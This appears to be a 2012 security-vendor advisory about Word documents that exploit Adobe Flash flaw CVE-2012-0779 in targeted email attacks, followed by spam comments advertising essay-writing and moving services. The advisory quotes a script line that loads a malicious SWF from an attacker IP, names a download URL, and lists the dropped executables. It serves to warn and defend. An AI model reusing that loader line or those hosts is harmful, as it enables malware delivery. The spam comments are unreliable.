12345

6/04/2012

[Warning] Malicious file for APT attack using CVE-2012-0779 exploit


1. Introduction

INCA Internet Response team detected attacks using latest Adobe Flash Player exploit (CVE-2012-0779).Especially we found malicious DOC files. With these reasons, users need to maintain latest Adobe Flash Player update to be safe from malicious security threats and need to be careful on downloading attachment from suspicious e-mail.



2. Cases of CVE-2012-0779

Various malicious files using CVE-2012-0779 exploit are found. Following figure shows malicious DOC files.



Malicious e-mail on April 13, 2012

This DOC file used CVE-2012-0779 exploit and is written in Korean. We can assume that this file can be used APT attack in Korea.

File name is "유통관련자료_수정본.doc". Run screen is as following.


This malicious DOC file contains script code which make user's PC access on certain URL. Malicious "exp.swf" is already being installed. Currently this malicious swf has been removed.

[download]
http://(~~)tkorea.com/uploadfiles/upload/exp.swf


This malicious file contains malicious EXE(XOR encoded).
Except this file, there were various malicious file which are written in English.


■ Malicious e-mail on May 03, 2012


"WUC Invitation Letter Guests.doc" contains CVE-2012-0779 exploit. Following figure is run screen.


DOC file includes following script code which can load malicious SWF file.

eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000%3E%3C/embed%3E')))


After downloading malicious file, following files will be executed in a row.

a. C:\Documents and Settings\[user account]\Application Data\Macromedia\Flash Player\#SharedObjects\temp.exe

b. C:\Documents and Settings\[user account]\Application Data\Macromedia\Flash Player\#SharedObjects\Flash_ActiveX.exe

c. C:\Documents and Settings\[user account]\Application Data\conime.exe

3. Summary

Official version of Adobe Flash Player 11.2.202.235 is distributing now. To be safe from CVE-2012-0779 exploit, users need to maintain latest update.

[Download]
http://get.adobe.com/kr/flashplayer/


To use PC safely from security threats of these malicious attachments, we recommend you download latest security updates and obey following "Security management tips" for general users.

Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function “ON”
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) runs responding system against various security threats.

12 comments:

  1. You know that research paper introduction is actually a crucial part of the paper itself? Click on the link to find out how to write it properly.

    ReplyDelete
  2. Thanks for sharing.I found a lot of interesting information here. A really good post, very thankful and hopeful that you will write many more posts like this one.
    https://pandahelper.me/
    https://kissanime.tips/
    https://get3dsemulator.org/

    ReplyDelete
  3. Reflection paper writing is a part of academic program. You can gain this skill at this blog.

    ReplyDelete

  4. نقل عفش من الرياض الى جدة افضل نقل عفش من الرياض الى جدة مكة




    نقل عفش من الرياض الى البحرين نقل عفش من الرياض الى البحرين

    نقل عفش من الرياض الى سلطنة عمان نقل عفش من الرياض الى سلطنة عمان

    ReplyDelete
  5. Online logistics management writing services are very difficult to complete and many students are always searching for Logistics Writing Services Online to help them complete their logistics coursework writing services and logistic research paper services.

    ReplyDelete
  6. Architectural science coursework writing help services have become very popular for students studying architectural science assignment writing services as they engage the best online Architectural Science Writing Services.

    ReplyDelete
  7. If you have specific requirements and need a PhD writer to complete your assignment i need someone to write my essay for me , our service allows you to choose such option.

    ReplyDelete
  8. The current status of your paper and the estimated time left till completion could be tracked from your Personal area with the site after the order has been placed.

    ReplyDelete
  9. There is a time when a student feels make my papers fully prepared for essay writing. However, when they take the pen, they cannot come up with even a single sentence. They are not able to gather ideas, come up with a problem or theme to work on.

    ReplyDelete
  10. Full satisfaction from the service. buying research papers We care that our customers are satisfied with the attitude of our company representatives and the quality of finished papers

    ReplyDelete